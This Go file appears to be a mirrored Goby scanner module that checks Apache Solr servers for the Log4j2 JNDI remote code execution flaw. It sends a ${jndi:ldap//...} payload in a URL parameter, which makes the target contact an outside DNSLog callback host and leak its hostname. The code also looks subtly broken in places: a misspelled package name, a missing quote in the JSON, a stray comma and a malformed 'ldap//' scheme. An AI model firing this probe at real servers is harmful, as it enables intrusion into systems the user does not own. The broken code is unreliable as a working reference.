mirror of https://github.com/qwqdanchun/Goby.git
103 lines
3.3 KiB
Go
103 lines
3.3 KiB
Go
|
package exploits
|
|||
|
|
|||
|
import (
|
|||
|
//根据需求导入相应的包
|
|||
|
"fmt"
|
|||
|
"git.gobies.org/goby/goscanner/goutils"
|
|||
|
"git.gobies.org/goby/goscanner/jsonvul"
|
|||
|
"git.gobies.org/goby/goscanner/godclient"
|
|||
|
"git.gobies.org/goby/goscanner/scanconfig"
|
|||
|
"git.gobies.org/goby/httpclient"
|
|||
|
"strings"
|
|||
|
"time"
|
|||
|
)
|
|||
|
|
|||
|
func init() {
|
|||
|
expJson := `{
|
|||
|
"Name": "Apache Solr Log4j2 Jndi RCE",
|
|||
|
"Level": "3",
|
|||
|
"Tags": [
|
|||
|
"rce"
|
|||
|
],
|
|||
|
"GobyQuery": "app=\"Solr\"",
|
|||
|
"Description": "Apache Log4j2被曝存在JNDI远程代码执行漏洞",
|
|||
|
"Product": "",
|
|||
|
"Homepage": "https://gobies.org/",
|
|||
|
"Author": "gobysec@gmail.com",
|
|||
|
"Impact": "",
|
|||
|
"Recommendation": "",
|
|||
|
"References": [
|
|||
|
"https://gobies.org/"
|
|||
|
],
|
|||
|
"HasExp": true,
|
|||
|
"ExpParams": null,
|
|||
|
"ExpTips": {
|
|||
|
"Type": "",
|
|||
|
"Content": ""
|
|||
|
},
|
|||
|
"ScanSteps": [
|
|||
|
"AND",
|
|||
|
{
|
|||
|
"Request": {
|
|||
|
"method": "GET",
|
|||
|
"uri": "/solr/admin/collections?action=",
|
|||
|
"follow_redirect": true,
|
|||
|
"header": {
|
|||
|
"User-Agent": "Mozilla/5.0(X11; Linux x86_64; rv:12.0) Gecko/20100101 Firefox/12.0"
|
|||
|
},
|
|||
|
"data_type": "text",
|
|||
|
"data": "",
|
|||
|
"set_variable": []
|
|||
|
},
|
|||
|
"ResponseTest": {
|
|||
|
"type": "group",
|
|||
|
"operation": "AND",
|
|||
|
"checks": [
|
|||
|
{
|
|||
|
"type": "item",
|
|||
|
"variable": "$code",
|
|||
|
"operation": "==",
|
|||
|
"value": "200",
|
|||
|
"bz": ""
|
|||
|
},
|
|||
|
{
|
|||
|
"type": "item",
|
|||
|
"variable": "$body",
|
|||
|
"operation": "contains",
|
|||
|
"value": "true",
|
|||
|
"bz": ""
|
|||
|
}
|
|||
|
]
|
|||
|
},
|
|||
|
"SetVariable": [
|
|||
|
"output|lastbody|regex|"
|
|||
|
]
|
|||
|
}
|
|||
|
],
|
|||
|
"ExploitSteps": [
|
|||
|
"AND",
|
|||
|
],
|
|||
|
"PostTime": "2022-05-24 22:33:22",
|
|||
|
GobyVersion": "1.9.325"
|
|||
|
}`
|
|||
|
|
|||
|
ExpManager.AddExploit(NewExploit(
|
|||
|
goutils.GetFileName(),
|
|||
|
expJson,
|
|||
|
//自定义POC函数,通过响应bool来确认漏洞是否存在
|
|||
|
func(exp *jsonvul.JsonVul, u *httpclient.FixUrl, ss *scanconfig.SingleScanConfig) bool {
|
|||
|
checkStr := goutils.RandomHexString(4) //RandomHexString:随机生成指定长度的字符串
|
|||
|
checkUrl, isDomain := godclient.GetGodCheckURL(checkStr) //GetGodCheckURl:生成DNSLog地址
|
|||
|
uri := "/solr/admin/collections?action=$%7Bjndi:ldap//$%7BhostName%7D." + checkUrl + "/a%7D" //拼接payload
|
|||
|
cfg := httpclient.NewGetRequestConfig(uri) //NewGetRequestConfig:构建GET请求自定义配置,返回RequestConfig
|
|||
|
cfg.VerifyTls = false //忽略ssl验证
|
|||
|
cfg.FollowRedirect = false //不跟随跳转
|
|||
|
cfg.Header.Store("Content-type", "application/x-www.form-urlencoded") //自定义请求头
|
|||
|
httpclient.DoHttpRequest(u, cfg) //DoHttpRequest:构建自定义请求配置,发送请求,返回请求结果HttpRespnse
|
|||
|
return godclent.PullExists(checkStr, time.Second*15) //在一段时间内检测是否有HTTP请求成功,如果请求成功返回true,否则返回false
|
|||
|
},
|
|||
|
|
|||
|
nil, //自定义EXP函数, 没有EXP,就写nil,
|
|||
|
))
|
|||
|
}
|